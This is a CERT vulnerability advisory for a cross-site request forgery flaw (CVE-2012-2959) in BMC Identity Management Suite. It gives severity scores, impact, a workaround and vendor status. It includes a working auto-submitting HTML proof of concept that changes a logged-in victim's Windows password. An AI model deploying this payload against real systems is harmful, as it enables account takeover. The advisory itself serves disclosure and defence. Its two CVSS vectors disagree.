Lucene search

K
certCERTVU:221180
HistoryJun 11, 2012 - 12:00 a.m.

BMC Identity Management Suite cross-site request forgery vulnerability

2012-06-1100:00:00
www.kb.cert.org
14

CVSS2

5.1

Attack Vector

NETWORK

Attack Complexity

HIGH

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:H/Au:N/C:P/I:P/A:P

EPSS

0.004

Percentile

72.6%

Overview

BMC Identity Management Suite v7.5.00.103 and possibility other versions are vulnerable to cross-site request forgery vulnerabilities.

Description

CWE-352: Cross-Site Request Forgery (CSRF):

It has been reported that BMC Identity Management Suite v7.5.00.103 and possibility other versions are vulnerable to cross-site request forgery in the user web interface.

Proof of concept to change a victims Windows password:

`<html><head><title>BMC IDM Change PW CSRF PoC</title></head>

<body onload=“document.getElementById(‘CSRF’).submit()”>

<form action=“&lt;https://xxx.xxx.xxx.xxx/idm/password-manager/changePasswords.do&gt;”; method=“post”
id=“CSRF”>

<input type=“hidden” name=“colChkbx_Tab1” value=“CN=Test User,OU=User
Accounts,DC=corporate,DC=business,DC=com corporate Win2000” />
<input type=“hidden” name=“password” value=“Abc123!” />
<input type=“hidden” name=“passwordAgain” value=“Abc123!” />
<input type=“hidden” name=“selAccts” value=“CN=user Name,OU=User
Accounts,DC=corporate,DC=business,DC=com corporate Win2000” />

</form></body></html>`


Impact

An unauthenticated attacker could trick a victim into clicking on a malicious link that could change any passwords managed by the BMC Identity Management Suite if the victim has a current logged in session on the web interface.


Solution

We are currently unaware of a practical solution to this problem.


Restrict access

As a general good security practice, only allow connections from trusted hosts and networks. Note that restricting access does not prevent XSS or CSRF attacks since the attack comes as an HTTP request from a legitimate user’s host. Restricting access would prevent an attacker from accessing the BMC Identity Management Suite web interface using stolen credentials from a blocked network location.


Vendor Information

221180

Filter by status: All Affected Not Affected Unknown

Filter by content: __ Additional information available

__ Sort by: Status Alphabetical

Expand all

Javascript is disabled. Click here to view vendors.

BMC Software Inc Affected

Updated: June 11, 2012

Status

Affected

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

CVSS Metrics

Group Score Vector
Base 3.5 AV:N/AC:M/Au:S/C:P/I:N/A:N
Temporal 2.7 E:U/RL:U/RC:UC
Environmental 0.9 CDP:L/TD:L/CR:ND/IR:ND/AR:ND

References

Acknowledgements

Thanks to Travis Lee for reporting this vulnerability.

This document was written by Michael Orlando.

Other Information

CVE IDs: CVE-2012-2959
Date Public: 2012-06-11 Date First Published:

CVSS2

5.1

Attack Vector

NETWORK

Attack Complexity

HIGH

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:H/Au:N/C:P/I:P/A:P

EPSS

0.004

Percentile

72.6%